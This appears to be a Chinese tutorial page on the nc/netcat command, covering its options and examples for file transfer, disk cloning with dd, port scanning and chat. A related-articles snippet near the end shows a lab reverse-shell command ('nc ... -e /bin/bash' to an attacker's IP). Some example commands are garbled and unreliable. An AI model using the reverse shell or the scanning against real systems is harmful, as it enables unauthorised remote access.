nc/netcat

nc/netcat命令

网络测试

nc命令netcat命令的简称,都是用来设置路由器。

语法

nc/netcat(选项)(参数)

选项

-g<网关>:设置路由器跃程通信网关,最多设置8个;
-G<指向器数目>:设置来源路由指向器,其数值为4的倍数;
-h:在线帮助;
-i<延迟秒数>:设置时间间隔,以便传送信息及扫描通信端口;
-l:使用监听模式,监控传入的资料;
-n:直接使用地址,而不通过域名服务器;
-o<输出文件>:指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;
-p<通信端口>:设置本地主机使用的通信端口;
-r:指定源端口和目的端口都进行随机的选择;
-s<来源位址>:设置本地主机送出数据包的IP地址;
-u:使用UDP传输协议;
-v:显示指令执行过程;
-<超时秒数>:设置等待连线的时间;
-z:使用0输入/输出模式,只在扫描通信端口时使用。

参数

  • 主机:指定主机的IP地址或主机名称;
  • 端口号:可以是单个整数或者是一个范围。

实例

远程拷贝文件

从server1拷贝文件到server2上。需要先在server2上,用nc激活监听。

server2上运行:

[[email protected] tmp]# nc - 1234 > .log

server1上运行:

[[email protected] ~]# ll install.log-rw-r–r–   1 root root 39693 12月 20   2007 install.log

[[email protected] ~]# nc -w 1 192.168.228.222 1234 < install.log

克隆硬盘或分区

操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。克隆硬盘或分区的操作,不应在已经mount的的系统上进行。所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工 具光盘)启动系统后,在server2上进行类似的监听动作:

nc -l -p 1234 | dd of=/dev/sda

server1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:

dd if=/dev/sda | nc 192.168.228.222 1234

完成上述工作的前提,是需要落实光盘的拯救模式支持服务器上的网卡,并正确配置IP。

端口扫描

nc -v -w 1 192.168.228.222 -z 1-1000localhost2 [192.168.228.222] 22 (ssh) open

保存Web页面

while true; do
    nc -l -p 80 -q 1 < somepage.html;
done

聊天

nc还可以作为简单的字符下聊天工具使用,同样的,server2上需要启动监听:

[[email protected] tmp]# nc -lp 1234

server1上传输:

[[email protected] ~]# nc 192.168.228.222 1234

这样,双方就可以相互交流了。使用Ctrl+D正常退出。

传输目录

从server1拷贝nginx-0.6.34目录内容到server2上。需要先在server2上,用nc激活监听,server2上运行:

[[email protected] tmp]# nc -l 1234 | tar xzvf -

server1上运行:

[[email protected] ~]# ll -d nginx-0.6.34
drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34

[[email protected] ~]# tar czvf – nginx-0.6.34 | nc 192.168.228.222 1234
时间: 2024-10-12 23:48:26

nc/netcat的相关文章

NC / Netcat - 反弹Shell

原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat>nc -l -p 2222 受害机:反弹/bin/bash 到攻击机(192.168.12.109)的2222端口 [email protected]:~# nc 192.168.12.109 2222 -e /bin/bash 反弹shell成功后即可在windows的cmd.exe下执行Linux下的/

NC(netcat)应用全记录&lt;持续更新&gt;

1. 连接tianya.cn(MIME欺骗) $ nc -nvv 221.11.172.178 80 Connection to 221.11.172.178 80 port [tcp/*] succeeded! get / http/1.1 HTTP/1.0 400 Bad request Cache-Control: no-cache Connection: close Content-Type: text/html <html><body><h1>400 Bad

nc 常用命令

nc(NetCat),在网络工具中有”瑞士军刀”的美誉,它短小精悍,功能强大,下面分享一些我平时经常用到的功能,更多的功能请google之. 1.基本参数想要连接到某处: nc [-options] hostname port[s] [ports] …绑定端口等待连接: nc -l -p port [-options] [hostname] [port]参数:-g gateway source-routing hop point[s], up to 8-G num source-routing

netcat 用法

功能说明:强大的网络工具 语 法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...] 参 数: -g<网关>  设置路由器跃程通信网关,最多可设置8个. -G<指向器数目>  设置来源路由指向器,其数值为4的倍数. -h   在线帮助. -

Netcat for Windows

April 10, 2009 Netcat is a simple networking utility which reads and writes data across network connections using the TCP/IP protocol. It's a wonderful tool for debugging all kinds of network problems. It allows you to read and write data over a netw

(11)nc命令(每周一个linux命令)

nc(netcat)实用程序几乎可用于所有涉及TCP或UDP的事情.它可以打开TCP连接,发送UDP数据包,监听任意TCP和UDP端口,进行端口扫描,处理IPv4和IPv6.与telnet不同,nc可以很好地编写脚本,并将错误消息分离为标准错误,而不是像telnet一样将错误消息发送至标准输出. 语法: nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来

tcpdump抓包分析具体解释

說實在的,對於 tcpdump 這個軟體來說,你甚至能够說這個軟體其實就是個駭客軟體, 因為他不但能够分析封包的流向,連封包的內容也能够進行『監聽』, 假设你使用的傳輸資料是明碼的話,不得了,在 router 上面就可能被人家監聽走了! 非常可怕吶!所以,我們也要來瞭解一下這個軟體啊!(註:這個 tcpdump 必須使用 root 的身份執行) [[email protected] ~]# tcpdump [-nn] [-i 介面] [-w 儲存檔名] [-c 次數] [-Ae] [-qX] [

linux ip

  鸟哥自由软件整合应用研究室  Love U ^^ Linux 常用网络命令介绍 最近升级日期:2006/08/02 Linux 的网络功能相当的强悍,一时之间我们也无法完全的介绍所有的网络命令, 这个章节主要的目的在介绍一些常见的网络命令而已.至于每个命令的详细用途将在后续服务器架设时, 依照命令的相关性来进行说明.当然,在这个章节的主要目的是在于将所有的命令汇整在一起,比较容易了解啦! 还有,这一章鸟哥新增了一些封包撷取的命令,若不熟悉没关系,先放着,全部读完后再回来这一章仔细练习啊! 网

Linux 常用命令解析及Bash Shell脚本用法示例

 摘要 Linux 命令是基于文本格式输入输出的一种程序,按照Unix哲学中强调的程序功能简单,输入宽松,输出严谨,各种程序组合可以具有更强大的功能,而具有这种灵活性的主要原因是Linux规定程序的输入输出必须坚持文件流格式,即文本格式,而这就是Linux系统的核心之一. 对于Bash,即Shell的一种,为现在主流Linux发行版本默认的命令行解释器,是一种功能强大的工具,可以实现对Linux支持的程序命令的组合,从而实现强大功能.类似于Window系统的bat文件,Bash具有更为强大的